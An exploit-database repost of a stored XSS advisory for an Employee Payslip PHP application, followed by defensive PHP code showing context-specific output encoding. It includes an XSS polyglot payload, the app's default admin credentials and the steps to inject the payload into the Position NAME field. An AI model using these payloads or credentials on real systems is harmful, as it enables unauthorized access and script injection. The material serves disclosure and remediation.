Employee Payslip - XSS Polyglots

CVE:               (none listed)
Category:          CWE-79
Price:             Not specified
Severity:          High
Author:            Not specified
Risk:              High
Exploitation Type: Remote
Date:              2023-03-14
CVSS:              CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023030034

Below is a copy:

# Title: Employee Payslip - XSS Polyglots
# Author: @Eawhitehat - Eren Arslan
# Demo available : https://www.sourcecodester.com/php/16264/updated-employee-payslip-generator-sending-mail-using-php-and-gmail-smtp.html
# CVE: N/A
# XSS POLYGLOTS
# Screenshot : https://prnt.sc/eeUxgczBF-Gj

Payload used:
 onclick=alert(1)//<button  onclick=alert(1)//> */ alert(1)//

Admin account : 
admin
admin123

Method:
Log in to the admin panel with the admin account: http://.../admin/

# Vulnerability
1. After logging in as SUPER ADMIN, go to http://.../admin/?page=positions (Position List page)
2. Click "Create New" and enter the payload in the "NAME" field:  onclick=alert(1)//<button  onclick=alert(1)//> */ alert(1)//
3. After the new position is created, click in the form to execute the XSS polyglot payload
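As an added defender-side example, not code from the Employee Payslip application or from the advisory: the stored position name rendered unsafely beside a version encoded for each context the polyglot above targets. It assumes the app echoes the stored value into an HTML attribute, element text and an inline script; the function names are hypothetical.

```php
<?php
declare(strict_types=1);

// Constructed sample: the advisory's payload as it would sit in the name column.
$name = ' onclick=alert(1)//<button  onclick=alert(1)//> */ alert(1)//';

// Unsafe pattern (hypothetical): the stored value is dropped straight into markup.
// In an unquoted attribute the leading "onclick=" spills into a real handler, and
// in element content the "<button ...>" text becomes a real tag.
function render_unsafe(string $name): string
{
    return "<td data-name=$name>$name</td>";
}

// Encoding for attribute values and element text. ENT_QUOTES encodes both quote
// styles, so the value stays inside a quoted attribute; the attribute itself must
// be quoted, because encoding alone does not stop an unquoted value from ending
// at the first space.
function esc_html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Encoding for a JavaScript string literal inside an inline <script>. json_encode
// adds the quotes and escapes the ones in the value, and the JSON_HEX_* flags turn
// < > & ' " into \uXXXX escapes, so the value can neither close the string literal
// nor emit a "</script>" that ends the script element.
function esc_js(string $value): string
{
    return json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
}

// Safe rendering: one encoder per output context.
function render_safe(string $name): string
{
    $safe = esc_html($name);
    return "<td data-name=\"$safe\">$safe</td>\n"
         . "<script>var positionName = " . esc_js($name) . ";</script>";
}

echo "Unsafe:\n", render_unsafe($name), "\n\nSafe:\n", render_safe($name), "\n";
```

In the safe output the angle brackets, quotes and slashes all survive as inert text, so the same stored name displays literally instead of running.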


Enjoy !
